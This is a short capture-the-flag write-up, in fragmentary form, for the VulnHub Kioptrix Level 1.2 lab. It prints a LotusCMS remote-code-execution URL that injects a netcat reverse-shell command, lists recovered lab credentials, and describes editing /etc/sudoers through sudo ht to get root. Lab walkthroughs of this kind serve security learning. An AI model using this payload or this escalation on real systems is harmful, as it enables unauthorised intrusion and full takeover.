Machine: https://www.vulnhub.com/entry/kioptrix-level-12-3,24/
LotusCMS RCE exploit
. We can find many exploits to get RCE. So, I studied the exploit and crafted a payload for reverse shell. Opening the crafted link gives reverse shell. http://192.168.0.13/index.php?page=index%27)%3B%24{system(%27nc+-e+%2Fbin%2Fsh+<ip address>+<port number>%27)}%3B%23
while listening on netcat if we open that link we will get a reverse shell./home/www/kioptrix3.com/gallery/gconfig.php
.http://192.168.0.13/phpmyadmin/
.dreg
is Mast3r
and pasword of loneferret
is starwars
.loneferret
and sudo
is enabled there and got some sudo binary
.su
is not exploitable as user loneferret
, so I tried to exploit ht
and to exploit ht
I need to export TERM=xterm
.sudo ht
and then pressed F3
to select /etc/sudoers
to open./bin/bash
to sudoers as instructed in the article and saved the file with F2
and quit with F10
or CTRL+C
.sudo /bin/bash
to get root shell.Congrats.txt
inside /root
directory and this is the flag file containing a big paragraph.Author: Zishan Ahamed Thandar